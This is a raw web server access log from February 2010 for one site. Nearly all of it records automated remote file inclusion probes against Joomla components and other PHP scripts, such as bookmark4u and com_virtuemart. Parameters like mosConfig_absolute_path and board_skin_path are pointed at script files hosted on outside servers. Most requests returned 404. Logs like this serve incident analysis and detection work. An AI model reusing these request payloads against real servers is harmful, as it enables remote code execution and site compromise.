79.99.44.89 - - [18/Feb/2010:04:42:39 -0800] "GET /logs/access_100201.log/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [18/Feb/2010:04:44:55 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
124.193.89.226 - - [18/Feb/2010:04:44:55 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:45:31 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:45:32 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:46:01 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:46:01 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:04:46:11 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:04:46:11 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:04:46:11 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [18/Feb/2010:04:47:29 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
124.193.89.226 - - [18/Feb/2010:04:47:29 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:49:04 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:04 -0800] "GET /logs/access_100124.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:04 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:08 -0800] "GET /logs/access_100124.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:08 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:09 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:09 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:52:09 -0800] "GET /logs/access_100124.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:53:50 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:54:01 -0800] "GET /logs/access_100203.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:54:02 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:54:13 -0800] "GET /logs/access_100203.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:54:33 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:54:33 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:54:38 -0800] "GET /logs/access_100201.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:55:09 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:55:21 -0800] "GET /logs/access_100203.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:56:27 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:56:27 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:04:56:27 -0800] "GET /logs/access_100201.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:56:41 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:56:41 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:57:41 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:57:41 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:57:41 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:58:14 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:58:14 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:58:14 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:58:17 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:58:28 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:58:29 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:58:29 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:58:34 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:59:02 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:01:21 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:02:09 -0800] "GET /logs/access_100123.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:02:09 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:02:09 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:03:02 -0800] "GET /logs/access_100208.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:04:13 -0800] "GET /logs/access_100208.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:04:19 -0800] "GET /logs/access_100117.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:04:20 -0800] "GET /logs/access_100105.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:04:25 -0800] "GET /logs/access_100117.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:04:25 -0800] "GET /logs/access_100105.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:04:29 -0800] "GET /logs/access_100105.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:04:29 -0800] "GET /logs/access_100117.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:05:04:49 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:05:04:50 -0800] "GET /ideal/forum/viewtopic.php?p=30240 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
82.77.131.46 - - [18/Feb/2010:05:05:14 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:05:14 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:05:14 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:05:18 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:05:18 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:05:21 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:05:06:45 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:05:06:45 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:05:06:45 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:06:57 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:07:21 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:07:57 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:08:01 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:05:08:38 -0800] "GET /include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:05:08:38 -0800] "GET /logs//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:05:08:38 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:05:08:44 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:05:09:31 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:05:09:31 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:05:09:31 -0800] "GET /logs/access_100208.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:05:09:40 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:09:52 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:05:10:27 -0800] "GET /logs/access_100105.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:13:02 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:13:02 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:13:02 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:13:49 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:14:42 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:14:42 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:14:42 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [18/Feb/2010:05:15:40 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [18/Feb/2010:05:15:40 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [18/Feb/2010:05:15:40 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:15:58 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:15:58 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:15:58 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:16:39 -0800] "GET /logs/access_100211.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:16:41 -0800] "GET /modules/xfsection/modify.php?dir_module=http://dev.w-rn.com/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:16:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://dev.w-rn.com/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:16:41 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://dev.w-rn.com/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:05:16:43 -0800] "GET /logs/access_100120.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:17:14 -0800] "GET /include/write.php?dir=http://dev.w-rn.com/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:17:14 -0800] "GET /logs//include/write.php?dir=http://dev.w-rn.com/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:17:14 -0800] "GET /logs/access_100111.log%20%20//include/write.php?dir=http://dev.w-rn.com/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [18/Feb/2010:05:17:25 -0800] "GET /logs/access_100120.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:18:44 -0800] "GET /ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:18:47 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:18:49 -0800] "GET /logs/access_100111.log%20%20//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [18/Feb/2010:05:18:59 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [18/Feb/2010:05:18:59 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
